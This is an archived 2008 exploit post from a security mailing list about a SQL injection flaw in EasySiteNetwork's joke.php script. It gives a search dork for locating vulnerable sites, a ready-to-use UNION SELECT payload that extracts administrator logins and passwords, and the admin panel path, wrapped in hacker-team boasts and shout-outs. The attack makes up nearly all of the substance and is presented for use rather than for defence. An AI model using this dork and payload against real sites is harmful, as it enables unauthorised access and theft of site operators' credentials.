OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
EasySiteNetwork (joke.php?id) Remote SQL injection Vulnerability

Ehsan_Hp200Hotmail.com
Date: Thu Dec 18 2008 - 00:22:35 CST


 ############################### IRANIN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
## EasySiteNetwork (joke.php?id)
##
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_hp200
##
## H0ME : www.only-4dl.tk
##
## Email : Ehsan_Hp200Hotmail.com
##
## VENDOR: http://www.easysitenetwork.com/
##
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
##
##

Dork : inurl:joke.php?id= "Powered by EasySiteNetwork"

 Exploite:

 www.victim.com/joke.php?id=-1992+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+admin_login--

###############################################################################
Admin Panel: www.victim.com/siteadmin

,##############################################################################
Special tanks to : All Parsi Hacker security Team members,SAHAND SHABAN , Dj7xpl , The.Mo3tafa , Jasoos Team ,Enigma2
,#######################################################################################################
 ############################### IRANIN THE BEST HACKERS IN THE WORLD ##################